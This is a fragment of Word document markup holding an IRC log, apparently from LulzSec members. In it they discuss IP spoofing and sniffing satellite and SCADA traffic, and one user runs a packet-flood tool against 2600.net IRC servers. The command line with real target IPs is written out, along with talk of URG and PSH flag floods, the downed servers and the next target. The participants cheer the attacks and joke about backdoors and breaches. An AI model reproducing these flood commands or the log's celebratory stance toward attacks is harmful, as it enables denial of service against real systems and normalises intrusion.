          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:08:19 storm i need to somehow get more spoofing boxes Jun 03 15:08:27 storm i have a few networks listed that allow it Jun 03 15:09:09 trollpoll i now a "complicated" technology to spoof and make totally imposible to track Jun 03 15:09:23 trollpoll is satellite based...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:09:36 trollpoll did you heard about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:09:41 storm well Jun 03 15:09:49 storm i dont know of anything untrackable Jun 03 15:09:50 trollpoll ill try to found a doc about it Jun 03 15:09:58 storm even my spoofed attacks are trackable Jun 03 15:10:02 storm if you have backbone access Jun 03 15:10:10 storm only if Jun 03 15:10:13 trollpoll yes, with a satellite the unique trackable will be that you are in europe Jun 03 15:10:18 trollpoll or in usa xD Jun 03 15:10:26 storm heh Jun 03 15:10:27 trollpoll because the satellite sends the signal to everybody Jun 03 15:10:32 trollpoll so many ppl can hear Jun 03 15:10:51 trollpoll the only way to track is in the "send" signal Jun 03 15:11:15 trollpoll but not in the receive, so, if you spoof your ip address to an ip address that you know that is used by satellite Jun 03 15:11:33 trollpoll you can send for one way and receive for another Jun 03 15:11:52 trollpoll you just need an isp that permit spoofing Jun 03 15:11:52 storm i usually just use random ip spoofing Jun 03 15:12:07 storm which is flag 0 for my program Jun 03 15:12:22 storm meaning it sends numerous source ips Jun 03 15:12:28 storm more than 400 id say Jun 03 15:12:47 joepie91 botflood in #lulzsec Jun 03 15:12:51 trollpoll cool Jun 03 15:13:20 storm on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:13:41 storm nvm Jun 03 15:14:08 Recursion MAN Jun 03 15:14:15 Recursion -caps Jun 03 15:14:36 Recursion map, I have more karma on my throwaway account than I do on my regular reddit account Jun 03 15:14:40 Recursion man* Jun 03 15:15:32 joepie91 lol Jun 03 15:16:35 trollpoll btw the 90% of the satellite traffic is plain text...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:16:50 trollpoll and is it possible to sniff whatever you want... Jun 03 15:16:59 trollpoll scada traffic ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:17:20 tflow http://lulzsecurity.com/ sailing smoothly again Jun 03 15:19:02 Topiary you think it'll hold captain?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:19:13 tflow yes Jun 03 15:19:58 tflow for sure Jun 03 15:21:13 storm doesnt look smooth to me tflow Jun 03 15:21:20 tflow howso Jun 03 15:22:47 trollpoll anyway, if you want to know more about it... http://www.blackhat.com/presentations/bh-dc-10/Nve_Leonardo/BlackHat-DC- 2010-Nve-Playing-with-SAT-1.2-wp.pdf Jun 03 15:23:29 sabu yes Jun 03 15:23:32 sabu we need to look at Jun 03 15:23:51 storm Sabu :D Jun 03 15:23:56 sabu yes brother Jun 03 15:24:00 storm howyu be Jun 03 15:24:23 storm im learning nmap &gt;;x Jun 03 15:24:24 storm er Jun 03 15:24:26 storm nmap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:24:26 storm no Jun 03 15:24:30 storm msf3 Jun 03 15:24:51 storm METASPLOIT NINJA'IN Jun 03 15:25:02 sabu word up Jun 03 15:27:41 joepie91 if you want to know what laws you are breaking Jun 03 15:27:42 joepie91 http://mpictcenter.blogspot.com/2011/06/legal- issues-in-pbs-hack.html Jun 03 15:27:48 joepie91 :P Jun 03 15:28:00 sabu sweet Jun 03 15:28:02 joepie91 aaaand gone was anonworld Jun 03 15:28:05 joepie91 &gt;.&lt; Jun 03 15:28:08 trollpoll "LulzSec, a splinter group of Anomous," Jun 03 15:28:11 trollpoll bad starting...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:28:12 joepie91 lolya Jun 03 15:28:17 joepie91 the rest is a copypaste Jun 03 15:28:22 joepie91 from a legalfag email Jun 03 15:31:01 storm LULzsec Jun 03 15:31:03 storm lmao Jun 03 15:32:40 lol lulzsex Jun 03 15:32:55 lol lulzseckz Jun 03 15:35:08 storm lol Jun 03 15:42:43 joepie91 there are so many spinoffs on twitter Jun 03 15:42:45 joepie91 and parodies Jun 03 15:42:46 joepie91 and fans Jun 03 15:42:47 joepie91 etc Jun 03 15:44:01 tflow it's a meme :o Jun 03 15:44:16 tflow server# netstat -n | wc -l Jun 03 15:44:16 tflow 394 Jun 03 15:44:21 tflow site is handling a fuckton of visitors Jun 03 15:44:27 tflow all those are legitimate connections btw Jun 03 15:44:42 joepie91 lol Jun 03 15:44:47 joepie91 do you have an access log?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:45:38 joepie91 also, why does the site not have the bitcoin address on it Jun 03 15:45:39 joepie91 :| Jun 03 15:46:26 tflow yeah i have an access log Jun 03 15:46:32 tflow i'll add bitcoin address soon Jun 03 15:46:38 tflow too busy with #fuckfbifriday atm Jun 03 15:46:54 storm tflow Jun 03 15:47:02 storm you backdoor that shit already?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:47:20 tflow backdoor what Jun 03 15:47:37 tflow :P Jun 03 15:47:38 storm i thought that was a server you owned Jun 03 15:47:39 storm xD Jun 03 15:47:57 tflow oh Jun 03 15:47:59 tflow no lol Jun 03 15:48:04 tflow that's our lulzsecurity.com server Jun 03 15:48:07 joepie91 tflow, cat access.log | grep wc -l Jun 03 15:48:10 joepie91 er Jun 03 15:48:11 storm ah Jun 03 15:48:16 joepie91 cat access.log | wc -l Jun 03 15:48:18 joepie91 lefail Jun 03 15:48:48 tflow 12668 Jun 03 15:50:16 joepie91 mmm, not bad Jun 03 15:50:28 joepie91 but cloudflare would probably be moar accurate Jun 03 15:50:33 tflow yeah Jun 03 15:50:36 tflow that's in like 10 mins Jun 03 15:53:05 joepie91 what is?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:53:18 tflow how long the site has been up on the next serv Jun 03 15:53:21 tflow new* Jun 03 15:54:25 storm i havent been able to load the site Jun 03 15:54:26 storm at all Jun 03 15:54:34 joepie91 people really do love lulzsec Jun 03 15:54:35 joepie91 "I can only hope they are charged with Treason. That can still get you the death penelty, if I'm not mistaken." Jun 03 15:55:01 sabu true Jun 03 15:55:02 joepie91 btw, tflow, might want to turn down cloudflare protection level to essentially off Jun 03 15:55:05 sabu treason for what exacty Jun 03 15:55:06 sabu ahah Jun 03 15:55:08 joepie91 idk?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:29 tflow yeah i did joepie91 Jun 03 15:55:37 joepie91 ok Jun 03 15:55:37 joepie91 also Jun 03 15:55:38 joepie91 Seven a.m., waking up in the morning, Jun 03 15:55:38 joepie91 Gotta get ready, gotta head downstairs Jun 03 15:55:38 joepie91 Gotta have my hacks, gotta have my snacks Jun 03 15:55:38 joepie91 Seein' everything , the time is goin' Jun 03 15:55:38 joepie91 Tickin' on and on, every's hackin' Jun 03 15:55:38 joepie91 Gotta get into the database Jun 03 15:55:38 joepie91 I hear a smash, I see the feds Jun 03 15:55:38 joepie91 Kickin' down the front door Jun 03 15:55:38 joepie91 Smashin' in the back door Jun 03 15:55:38 joepie91 Gotta make my mind up, Jun 03 15:55:39 joepie91 How can I escape?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:40 joepie91 It's Friday, Friday Jun 03 15:55:41 joepie91 It's Fuck FBI Friday Jun 03 15:55:42 joepie91 Everybody's lookin' forward to the hackin', hackin' Jun 03 15:55:43 joepie91 Friday, Friday Jun 03 15:55:44 joepie91 Hackin' it on Friday Jun 03 15:55:45 joepie91 Everybody's lookin' forward to the break in Jun 03 15:55:50 Topiary any flood attempts so far tflow?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:55:50 tflow lol nice Jun 03 15:55:53 tflow Topiary, Jun 03 15:55:54 tflow Topiary, nope Jun 03 15:56:01 tflow any flood attempts will be killed by cloudflare Jun 03 15:56:09 tflow plus the site is running on a dedi Jun 03 15:56:14 tflow so it should be all good Jun 03 15:56:23 Topiary that's awesome joepie Jun 03 15:56:26 Topiary did you write that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:56:36 joepie91 noes Jun 03 15:56:38 Topiary also hackin' = leakend Jun 03 15:56:40 joepie91 http://www.escapistmagazine.com/forums/read/18.288904-Hacking-Group-LulzSec- gears-up-for-Fuck-FBI-Friday?page=2 Jun 03 15:56:43 Topiary must change to leakend Jun 03 15:56:52 joepie91 tflow: http floods get through sometimes Jun 03 15:56:57 joepie91 it takes cloudflare 1 or 2 days Jun 03 15:56:59 joepie91 to detect the, Jun 03 15:57:00 joepie91 them* Jun 03 15:57:02 joepie91 and block them Jun 03 15:57:03 joepie91 &gt;.&gt; Jun 03 15:57:09 sabu yea but im a superb admin Jun 03 15:57:14 joepie91 then again, a http flood won't do much if you are running lighttpd/nginx Jun 03 15:57:15 sabu I'll deter the attacks Jun 03 15:57:28 storm Sabu Jun 03 15:57:31 sabu hi Jun 03 15:57:41 storm you should setup the ircd server to block incoming udp attacks Jun 03 15:57:46 storm since irc doesnt need udp at all Jun 03 15:57:51 joepie91 also, it seems Cloudflare is happy with their new customers in anon, lulzsec, etc Jun 03 15:57:51 joepie91 :P Jun 03 15:59:00 storm lol Jun 03 15:59:01 Topiary CloudFlare CEO = our homeboy Jun 03 15:59:05 Topiary BitCoin owner = our homeboy Jun 03 15:59:08 Topiary Pastebin owner = our homeboy Jun 03 15:59:13 Topiary Mediafire owner = faggot Jun 03 15:59:23 storm lets pwn mediafire Jun 03 15:59:29 storm they sux anyway Jun 03 15:59:48 joepie91 lol Jun 03 15:59:51 joepie91 mediafire removed it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 15:59:51 joepie91 aldo Jun 03 15:59:52 joepie91 also* Jun 03 15:59:54 joepie91 "bitcoin owner" Jun 03 15:59:55 joepie91 no exist Jun 03 15:59:59 Topiary on what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:00:20 Topiary oh right Jun 03 16:00:33 tflow just @bitcoinmedia Jun 03 16:00:36 joepie91 there is no central owner, remember? :P Jun 03 16:07:49 joepie91 google news frontpage: http://arstechnica.com/tech- policy/news/2011/06/lulz-sony-hackers-deny-responsibility-for-misuse-of- leaked-data.ars Jun 03 16:08:22 tflow awesome image Jun 03 16:08:26 lol lol at tht pic xD Jun 03 16:08:52 lol thts awesome xD Jun 03 16:09:05 joepie91 lol ye Jun 03 16:09:10 joepie91 ars has been posting some great pics Jun 03 16:09:12 joepie91 idk who makes them Jun 03 16:09:13 joepie91 but they are epic Jun 03 16:11:11 storm glad i dont have a ps3 Jun 03 16:13:17 joepie91 Be proactive about following security best practices and data security compliance requirements. Don't be a Sony. Jun 03 16:13:20 joepie91 lol'd Jun 03 16:13:29 joepie91 do I smell a new meme?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:13:33 joepie91 "Don't be a Sony" Jun 03 16:13:37 joepie91 http://www.pcworld.com/businesscenter/article/229351/sony_hacked_again_how_not_to_do_network_security.html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16:13:39 Topiary Sony I am disappoint Jun 03 16:13:56 Topiary Pony Slaystation!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:14:03 joepie91 lol Jun 03 16:14:49 Topiary is anyone still on 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:14:52 Topiary if so: disperse Jun 03 16:14:54 Topiary fuck that shithole Jun 03 16:15:00 Topiary in our channel anyway Jun 03 16:17:03 trollpoll i think (hope) nobody is still there Jun 03 16:18:19 joepie91 also Jun 03 16:18:19 joepie91 http://www.spiegel.de/netzwelt/web/0,1518,766167,00.html Jun 03 16:18:23 joepie91 and well, the channel died out a bit Jun 03 16:18:25 joepie91 after the botflood Jun 03 16:19:08 Topiary I hope none of us are still there Jun 03 16:20:19 storm Topiary I agree ;p Jun 03 16:20:25 storm their server got owned Jun 03 16:20:28 storm after we left Jun 03 16:20:45 storm collective was gone as well as every single server i knew of Jun 03 16:20:45 storm ;x Jun 03 16:22:13 * joepie91 is still logged on Jun 03 16:22:34 storm do /map Jun 03 16:22:41 storm all of the servers are gone Jun 03 16:22:42 storm lols Jun 03 16:22:54 Topiary yeah none of us should be in #lulzsec Jun 03 16:23:06 Topiary we decided to ditch such a filthy room :x Jun 03 16:23:08 joepie91 - collective.2600.net ----------------------------- - | Users: 359 (56.2%) Jun 03 16:23:08 joepie91 - '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 03 16:23:08 joepie91 - |- djslocker.2600.net ----------------------- | Users: 92 (14.4%) Jun 03 16:23:08 joepie91 - |- bartholomew.2600.net --------------------- | Users: 179 (28.0%) Jun 03 16:23:08 joepie91 - '- services.2600.net ------------------------ | Users: 9 (1.4%) Jun 03 16:23:08 joepie91 - End of /MAP Jun 03 16:23:10 lol you've killed all their server xD?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:23:14 storm no Jun 03 16:23:18 storm oh i see Jun 03 16:23:22 storm madjack isnt linked Jun 03 16:23:25 storm weird Jun 03 16:23:33 storm i killed their servers hard last night Jun 03 16:23:43 storm forgot about it running for like 20 mins just ganking Jun 03 16:23:48 lol hit collective it has most users xD Jun 03 16:23:52 storm lolol Jun 03 16:23:54 storm sure thing Jun 03 16:23:56 storm 1 sec Jun 03 16:25:50 storm root@YNService(~/.local)]#./nsdapx 208.111.35.75 202.103.67.101 6667 0 20 0 Jun 03 16:25:51 storm Sending packets of size 40....</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:26:05 storm Sending packets of size 40....x 208.111.35.75 218.108.235.101 6667 0 20 0 Jun 03 16:26:07 storm lolz Jun 03 16:26:36 storm i should hit them with tons of spoofage Jun 03 16:26:37 storm from Jun 03 16:26:40 storm 101.101.101.101 Jun 03 16:26:43 storm lolololol Jun 03 16:27:09 Topiary they're gonna be so fucking angry Jun 03 16:28:48 joepie91 - Closing Link: s514735fe.adsl.wanadoo.nl (Ping timeout: 240 seconds) Jun 03 16:28:48 joepie91 ~ Connection closed Jun 03 16:28:49 joepie91 interesting Jun 03 16:30:20 storm lol its their fault Jun 03 16:30:29 storm for being fucktwits Jun 03 16:35:06 * pwnsauce (pwnsauce@HA-4fq.4hj.tbgr2g.IP) has joined #pure- elite Jun 03 16:35:11 storm pwnsauce :D Jun 03 16:35:15 pwnsauce hey!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:35:19 pwnsauce im a bit fucked Jun 03 16:35:19 storm sup cutie Jun 03 16:35:22 pwnsauce not much Jun 03 16:35:39 storm HACK US, AND WE WILL BOMB YOU Jun 03 16:35:48 lol This is the second time hackers have targeted Sony's computer network - in April they stole data from more than 100 million accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:35:49 lol only second?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:36:00 lol im sure the score is at like HACKERS 13 SONY 0 Jun 03 16:36:14 pwnsauce LOL Jun 03 16:36:18 pwnsauce we winrar Jun 03 16:36:24 pwnsauce Kayla &lt;3 Jun 03 16:38:35 storm 16:38 -!- djslocker.2600.net ------------------------- ------ | Users: 145 Jun 03 16:38:48 storm (34.6%) Jun 03 16:38:48 storm 16:38 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 03 16:38:48 storm (0.0%) Jun 03 16:38:48 storm 16:38 -!- |- bartholomew.2600.net -------------------- - | Users: 265 Jun 03 16:38:48 storm (63.2%) Jun 03 16:38:48 storm 16:38 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 03 16:38:48 storm (2.1%) Jun 03 16:38:48 storm collective is gone Jun 03 16:38:50 Topiary &gt;bartholomew Jun 03 16:38:53 Topiary hello newcomer Jun 03 16:38:59 Topiary shall we pop its DDoS cherry?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:39:12 storm i hit it last night Jun 03 16:39:14 storm but yeah Jun 03 16:39:15 storm :P Jun 03 16:40:46 pwnsauce hehehehe Jun 03 16:40:56 pwnsauce SYN storm ahead me bretheren Jun 03 16:41:16 storm lol Jun 03 16:41:18 storm not SYN Jun 03 16:41:20 storm urg Jun 03 16:41:21 storm !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:41:22 storm &lt;# Jun 03 16:41:24 storm &lt;3* Jun 03 16:41:27 storm urgent ftw Jun 03 16:41:35 pwnsauce AAAH Jun 03 16:41:37 pwnsauce :D Jun 03 16:41:43 storm their servers are like URGENT MESSAGE FROM LULZSEC Jun 03 16:41:44 storm drop Jun 03 16:41:45 storm drop Jun 03 16:41:45 storm drop Jun 03 16:41:51 pwnsauce try PSH also Jun 03 16:41:52 joepie91 guys Jun 03 16:41:53 joepie91 http://www.wired.com/threatlevel/2011/06/internet- a-human-right Jun 03 16:41:58 storm yeah i use push a lot Jun 03 16:42:00 pwnsauce Internet IS a right!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:42:04 joepie91 A United Nations report said Friday that disconnecting people from the internet is a human rights violation and against international law.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:42:07 pwnsauce brb need food Jun 03 16:42:07 storm i can hit with any tcp flag Jun 03 16:42:08 storm ;p Jun 03 16:42:10 pwnsauce :D Jun 03 16:45:28 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 16:45:53 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 16:50:56 storm 16:50 -!- collective.2600.net ------------------------ ------ | Users: 190 Jun 03 16:50:56 storm (44.8%) Jun 03 16:50:56 storm 16:50 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 03 16:50:56 storm (0.0%) Jun 03 16:50:56 storm 16:50 -!- |- djslocker.2600.net ---------------------- - | Users: 225 Jun 03 16:50:56 storm (53.1%) Jun 03 16:50:56 storm 16:50 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 03 16:50:56 storm (2.1%) Jun 03 16:50:59 storm gone Jun 03 16:51:37 Topiary amazing Jun 03 16:51:40 Topiary fucking 2600 Jun 03 16:52:05 Topiary you're like our resident sniper sitting in the crow's nest with a goddamn deck-shattering electricity blast Jun 03 16:52:25 Topiary enemy ships being riddled with holes Jun 03 16:52:26 storm RPF: Jun 03 16:52:27 storm ROFL Jun 03 16:52:35 storm wow Jun 03 16:52:38 storm you're epic Jun 03 16:52:47 joepie91 lol Jun 03 16:52:49 joepie91 Topirya Jun 03 16:52:52 joepie91 Topiary * Jun 03 16:52:55 joepie91 write a fucking book Jun 03 16:52:58 joepie91 I'm serious Jun 03 16:52:58 storm Jun 03 16:52:58 joepie91 lol Jun 03 16:53:02 storm yeah dude lofl Jun 03 16:53:38 storm 700 seconds to completely down that server. on both of them Jun 03 16:53:45 sabu lol\ Jun 03 16:53:49 storm thats with 200mbps though Jun 03 16:54:04 storm my gigabit was so ownage before i lost it Jun 03 16:54:06 storm :( RIP Jun 03 16:54:16 Topiary you guys have to just picture ourselves as an awesome boat crew, and storm is just chilling in that nest with a mounted rail gun scorching the living fuck out of incoming fleets Jun 03 16:54:17 storm shit downed servers in 200seconds Jun 03 16:54:33 storm rofl Jun 03 16:54:53 joepie91 Topiary Jun 03 16:54:56 joepie91 why is lulzsec not trending yet Jun 03 16:54:57 joepie91 on twitter Jun 03 16:55:02 Topiary :( because we lame Jun 03 16:55:07 storm trending how Jun 03 16:55:08 trollpoll lol Jun 03 16:55:16 Topiary twitter trending is rigged Jun 03 16:55:27 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:55:28 storm @LulzSec Im in irc.2600.net and everyone is dropping like flies. Also, did you see those threats by @AnonymousNL Jun 03 16:55:36 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 16:55:38 storm uh oh Jun 03 16:55:38 trollpoll the twitter algorithm is not for a long term topic...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:55:40 storm THREATZ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:56:01 Topiary the twitter trend system is based on mainstream "forgot what I was talking about yesterday" ADHD logic Jun 03 16:56:13 trollpoll yep Jun 03 16:56:17 Topiary just like 20-minute TV episodes Jun 03 16:56:22 trollpoll so, create a new hashtag Jun 03 16:56:31 Topiary #FuckFBIFriday Jun 03 16:56:32 trollpoll if you wanna be tt..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:56:32 Topiary is our current Jun 03 16:56:38 trollpoll lol Jun 03 16:56:46 storm it's funny though Topiary Jun 03 16:56:47 storm cause like Jun 03 16:56:52 storm if you read 2600's shit Jun 03 16:56:58 storm its like they're sucking up Jun 03 16:57:19 Topiary we should just tell them we'll DDoS them until they forbid Jester to chill there Jun 03 16:57:21 storm but yet they took our channels registery Jun 03 16:57:38 storm not even that, i'm more pissed about the channel being taken over Jun 03 16:57:41 storm thats bunk as hell Jun 03 16:57:48 storm admins dont do that lame shit Jun 03 16:58:14 storm uh oh Jun 03 16:58:19 storm i think i nulled their server Jun 03 16:58:41 Topiary pity, looks like they lost another frigate Jun 03 16:58:54 joepie91 lool Jun 03 16:58:56 storm i really did bust its null cherry i guess Jun 03 16:59:01 storm cause i didnt null it last night Jun 03 16:59:10 Topiary it capsized Jun 03 16:59:17 Topiary not getting drained for at least 7 minutes Jun 03 16:59:24 Topiary then more flood?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:59:27 storm sure Jun 03 16:59:35 storm djslocker.2600.net next Jun 03 16:59:39 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:59:55 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 17:00:32 sabu http://www.youtube.com/watch?v=u6LgIWr47LQ = hhahhahahha watch them get on the black guy Jun 03 17:01:02 joepie91 is Awinee SERIOUSLY still tweeting to you guys? Jun 03 17:01:07 joepie91 he sad he is getting ignored?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
